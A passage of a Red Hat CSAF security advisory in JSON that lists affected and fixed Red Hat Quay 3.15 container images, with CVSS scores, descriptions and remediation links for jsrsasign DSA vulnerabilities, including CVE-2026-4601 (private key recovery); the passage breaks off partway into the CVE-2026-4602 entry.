"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsrsasign: jsrsasign: Cryptographic signature forgery via malicious DSA domain parameters"
},
{
"cve": "CVE-2026-4601",
"cwe": {
"id": "CWE-325",
"name": "Missing Cryptographic Step"
},
"discovery_date": "2026-03-23T06:01:44.014846+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450209"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsrsasign. An attacker can exploit a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process, specifically within the KJUR.crypto.DSA.signWithMessageHash function. By manipulating the signature generation to force specific values, the library emits an invalid signature without retrying. This vulnerability allows an attacker to recover the private key used for signing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsrsasign: jsrsasign: Private Key Recovery via Missing Cryptographic Step in DSA Signing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: A flaw in the jsrsasign library allows for private key recovery due to a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process. An attacker can manipulate signature generation within the KJUR.crypto.DSA.signWithMessageHash function to force specific values, enabling the recovery of the private key. This impacts Red Hat products utilizing jsrsasign, such as Migration Toolkit for Virtualization and Red Hat Quay.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4601"
},
{
"category": "external",
"summary": "RHBZ#2450209",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450209"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4601",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4601"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4601",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4601"
},
{
"category": "external",
"summary": "https://gist.github.com/Kr0emer/93789fe6efe5519db9692d4ad1dad586",
"url": "https://gist.github.com/Kr0emer/93789fe6efe5519db9692d4ad1dad586"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/commit/0710e392ec35de697ce11e4219c988ba2b5fe0eb",
"url": "https://github.com/kjur/jsrsasign/commit/0710e392ec35de697ce11e4219c988ba2b5fe0eb"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/pull/645",
"url": "https://github.com/kjur/jsrsasign/pull/645"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370941",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370941"
}
],
"release_date": "2026-03-23T05:00:13.312000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsrsasign: jsrsasign: Private Key Recovery via Missing Cryptographic Step in DSA Signing"
},
{
"cve": "CVE-2026-4602",
"cwe": {
"id": "CWE-681",
"name": "Incorrect Conversion between Numeric Types"
},
"discovery_date": "2026-03-23T06:01:28.729668+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450206"
}
],
"notes": [
{
"category": "description",
